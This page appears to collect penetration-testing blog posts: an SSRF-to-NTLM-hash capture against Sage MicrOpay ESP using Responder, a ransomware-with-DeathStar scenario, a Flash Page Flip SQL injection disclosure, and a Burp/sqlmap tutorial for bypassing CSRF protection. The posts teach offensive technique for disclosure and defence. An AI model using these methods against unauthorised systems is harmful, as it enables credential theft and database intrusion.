Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include pl, sh, exe, and in this instance, .dll.

Image Source

Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do, I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we can get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.

So we have a web application on the inside… and it thinks I’m it’s database server…

Image Source

I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on formatting it like this:

…which made my Responder go off like crazy.

Image Source

For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed through the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.

 

The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

DeathStar (and BloodHound) don’t rely on exploiting any actual vulnerabilities. Rather DeathStar leverages Active Directory configuration and allocation of privilege in order to find and exploit a path of domain joined systems that can be travelled, one hop at a time, in order to eventually obtain DA privileges. The BloodHound github page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password spraying attack against Remote Desktop Services or Citrix  (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like Bloodhound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Vulnerability Disclosure: SQL Injection in Flash Page Flip

During an engagement for one of our clients we came across Flash Page Flip and found that it is vulnerable to SQL Injection. As per our responsible disclosure policy, the creators of Flash Page Flip were contacted to advise them of the issue.

90 days have passed since our initial communication, and we have received no further response. SQL injection is not a new topic. To be more precise, it is a 20th century bug which is supposed to be long gone. The reason we decided to pursue this vulnerability officially (CVE-2015-1556 and CVE-2015-1557) is due to the apparently wide spread use of this application.

googlin

The lack of input validation was noticed across the majority of Flash Page Flip’s code and affected multiple pages such as:

  • NewMember.php
  • GetUserData.php
  • SaveUserData.php
  • DeleteUserData.php
  • /xml/Pages.php

In other instances weak input sanitisation functionality was implemented, before the SQL query was sent to the backend database. Some of the affected pages are listed below:

  • /admin/EditSubCat.php
  • /admin/ViewPage.php
  • /admin/AddMag.php
  • /admin/AddCat.php
  • /admin/EditCat.php

Exploitation of this vulnerability could allow attackers to extract the data used by Flash Page Flip which may be considered not sensitive. However, Flash Page Flip could also be used as a plugin to other CMS platforms and therefore may share the same database, as it happened during our engagement. In this case, SQL Injection may result in exposure to more sensitive CMS data, including credentials.

The full advisory can be found here.

Communication timeline:

  • 27th Jan 2015 – Contacted vendor with initial disclosure
  • 10th Feb 2015 – Contacted vendor with CVE identifiers
  • 29th Apr 2015 – Vulnerability published

Fuzzing and Sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthough for setting up a Session Handling Rule and macro in Burp suite for use with Burp’s Intruder. In this part, I will walkthrough a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to login to the application, and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.

screenshot11

There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.

screenshot12

screenshot13

In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies is irrelevant, since Burp will replace these based on the macro.
If it was a POST, you would need to include a similar –data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).

Running sqlmap, we start to see it doing it’s thing in the Burp Proxy window.

Screenshot a

That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.

screenshot b

Conclusion

In this two part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).

Fuzzing and sqlmap inside CSRF-protected locations (Part 1)

– @dave_au

Hi all, David here. I was recently testing a web app for a client written in ASP.NET MVC. The developers are pretty switched on, and had used RequestValidation throughout the application in order to prevent CSRF. Further to this, in several locations, if there was a RequestValidation failure, they were destroying the current session and dropping the user back to the login form. Brutal.

I didn’t think that there would be any injection issues in the app, but I needed to test all the same and this presented an interesting challenge – how to fuzz or sqlmap on target parameters within the CSRF-protected pages of the application.

If I opted for a manual approach, the process would look like this:

  1. Login to the application
  2. Navigate to the page under test
  3. Switch Burp proxy to intercept
  4. Submit and intercept the request
  5. Alter the parameter under test in Burp, then release the request
  6. Observe results
  7. Goto 1

This would be incredibly slow and inefficient, and wouldn’t really provide a way of using external tools.

I scratched my head for a while and did some reading on Buby, Burp Extender and Sqlmap tamper scripting until I finally came across an article from Carstein at 128nops which led me to further reading by Dafydd on the Portswigger Web Security Blog. Turns out that Burp suite can do exactly what I needed, out of the box, so I thought I’d put together a step-by-step for how I solved the problem.

Fuzzing (with Intruder) inside CSRF

Note: Intruder has built-in recursive grep functionality that can be used in some circumstances to take the CSRF token from one response and use it in the following request (&c.)[1]. This wasn’t much good to me, since the session was being destroyed if CSRF validation failed.

In Burp terminology, you need to create a Session Handling Rule to make Intruder perform a sequence of actions (login, navigate to page under test) before each request.

Go to the “Options” tab, and select the “Sessions” sub-tab. “Session Handling Rules” is right at the top.

screenshot1

Click the “Add” button to create a new Session Handling Rule. The Session Handling Rule editor window opens. Give the rule a meaningful name, then click the “Add” button for “Rule Actions” and select “Run a macro” from the drop-down.

screenshot2

This opens the Session Handling Action Editor window…

screenshot3

In this window, click the “Add” button next to “Select macro:”. This opens the Macro Editor and Macro Recorder windows (shown a further on). Now that Burp is set up and waiting to record the sequence, switch over to your web browser. In a new window / session (making sure to delete any leftover session cookies), navigate to the login page, login, then navigate to the page within the application where you want to be doing fuzz testing. Once you are there, switch back over to Burp. The Macro Recorder should show the intercepted requests.

screenshot4

Select the requests that you want to use in the macro and click “OK”. This will close the Macro Recorder window.

screenshot5

In the Macro Editor window, give the macro a meaningful name and look through the “Cookies received”, “Derived Parameters” and “Preset Parameters” columns to check that Burp has analysed the sequence correctly. When you’re happy, you can test the macro out by clicking the “Test Macro” button. If everything looks alright, click “OK” to close the Macro Editor window.

screenshot6

Almost there.

Back in the Session Handling Action Editor window, you should be OK to leave the other options for updating parameters and cookies as-is. Click “OK” to exit out of here.

Now, back in the Session Handling Rule Editor window, you’ll see your macro listed in the Rule Actions…

screenshot7

Before you close this window, switch over to the “Scope” tab and alter the scope for the rule to be just for Intruder and “Include all URLs”. (If you want to be more specific, you could specify the URL that you wanted the rule to apply to, but I just put it in scope for all of Intruder, and remember to turn the rule off when I’m not using it. This becomes more important in Part 2 of this post.) Then close the Session Handling Rule Editor window.

screenshot8

Your session handling rule is now defined.

Next, go back over to Burp’s proxy and send the request that you want to fuzz over to Intruder in the usual way.

screenshot9

In Intruder’s “Position” tab, you’ll want to clear all of the injection points except for the one that you want to specifically fuzz test. Session cookies and any CSRF tokens (in cookies or hidden form fields) will be populated automatically by Intruder from the macro sequence.

screenshot10

Set your payloads and other options as required. If the application is sensitive to multiple concurrent sessions for the same user, you will need to reduce the number of threads to 1 in the “Options” tab.

Then start Intruder. You will almost certainly notice that Intruder runs slowly; this is to be expected when you consider that it is going through a new login sequence for each request.

To fuzz different parameters on the same page, just go back into “Positions” and choose the next target.

To fuzz parameters on a different page, you will probably need to go back into your Session Handling Rule and edit your macro (or define a new macro) that logs in and navigates to the new target page.

In part 2 of this post, I’ll step through a slightly different scenario where we use an external tool (sqlmap), proxied through Burp, with a Session Handling rule running on Burp’s Proxy.